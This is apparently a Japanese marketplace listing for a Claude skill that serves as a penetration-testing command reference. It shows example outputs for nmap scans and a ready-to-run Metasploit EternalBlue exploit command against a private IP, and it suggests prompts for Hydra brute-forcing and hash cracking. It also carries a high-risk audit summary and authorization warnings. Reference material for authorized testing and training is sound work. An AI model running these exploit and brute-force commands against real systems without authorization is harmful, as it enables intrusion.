pentest-commands
Pentest コマンドリファレンス
このスキルは、渗透テストツールの包括的なコマンドリファレンスを提供します。認定された評価において、セキュリティ専門家がnmap、Metasploit、nikto、SQLMap、Hydra、その他のセキュリティテストコマンドを素早く検索できるようになります。
スキルZIPをダウンロード
Claudeでアップロード
設定 → 機能 → スキル → スキルをアップロードへ移動
オンにして利用開始
テストする
「pentest-commands」を使用しています。 192.168.1.1のポートをスキャンするためのnmapコマンドを表示
期待される結果:
TCP SYNスキャン(ステルス): nmap -sS 192.168.1.1
フルTCP connectスキャン: nmap -sT 192.168.1.1
UDPスキャン: nmap -sU 192.168.1.1
全ポート: nmap -p- 192.168.1.1
サービスバージョン: nmap -sV 192.168.1.1
OS検出: nmap -O 192.168.1.1
包括的スキャン: nmap -A 192.168.1.1
「pentest-commands」を使用しています。 EternalBlueエクスプロイトを使用するためのMetasploitコマンドは何ですか?
期待される結果:
msfconsole -x "use exploit/windows/smb/ms17_010_eternalblue; set RHOST 192.168.1.1; exploit"
またはインタラクティブ: msfconsole > search type:exploit name:ms17_010
> use exploit/windows/smb/ms17_010_eternalblue
> set RHOST 192.168.1.1
> exploit
セキュリティ監査
高リスクThis skill provides a comprehensive reference for penetration testing tools including Metasploit, nmap, nikto, SQLMap, Hydra, John the Ripper, and Aircrack-ng. The static analysis confirmed critical findings related to exploitation frameworks and password cracking tools. While this is a legitimate security testing reference for authorized use, it provides unconstrained access to dangerous tools without authorization verification. Risk Level: HIGH - Recommend restricted distribution or content modifications to add authorization safeguards.
重大な問題 (2)
高リスクの問題 (3)
中リスクの問題 (2)
低リスクの問題 (1)
リスク要因
⚙️ 外部コマンド (37)
🌐 ネットワークアクセス (84)
📁 ファイルシステムへのアクセス (2)
検出されたパターン
品質スコア
作れるもの
セキュリティ専門家クイックリファレンス
認定渗透テスト実施者は、認定セキュリティ評価中にこのスキルをクイックコマンド検索として使用します。包括的なコマンドリファレンスにより、ドキュメントを検索する時間を節約できます。
セキュリティトレーニングと教育
渗透テストを学習する学生は、このスキルを使用して、ラボ環境での様々なセキュリティテストツールの正しいコマンド構文を理解します。
レッドチームオペレーション
レッドチームメンバーは、認定レッドチームエンゲージメント中にこのコマンドリファレンスを使用し、ネットワークスキャン、悪用、およびポストエクスプロイトコマンドを素早く実行します。
これらのプロンプトを試す
192.168.1.0/24のターゲットネットワークをスキャンしてライブホストとオープンポートを発見するnmapコマンドを表示
Windowsターゲットに対してEternalBlueエクスプロイトを検索して使用するためのMetasploitコマンドを見つける
SSHログインのブルートフォース用のHydraコマンドと、パスワードハッシュのクラック用のJohn the Ripperコマンドを表示
http://192.168.1.100のWebアプリケーションの脆弱性テストのためのniktoとSQLMapコマンドを提供
ベストプラクティス
- テスト対象のシステムに対して事前に書面による認可を得ていることを常に確認してください
- タイミングテンプレート(-T4、-T5)は検出やシステムへの影響を避けるために注意して使用してください
- 渗透テストレポートのために実行したすべてのコマンドと発見事項を文書化してください
回避
- 明示的な認可なしにこれらのコマンドをシステムに使用しないでください
- 本番システムを停止させる可能性のある積極的なスキャンの実行を避けてください
- 悪意のある行為者を助ける可能性のある結果を共有または公開しないでください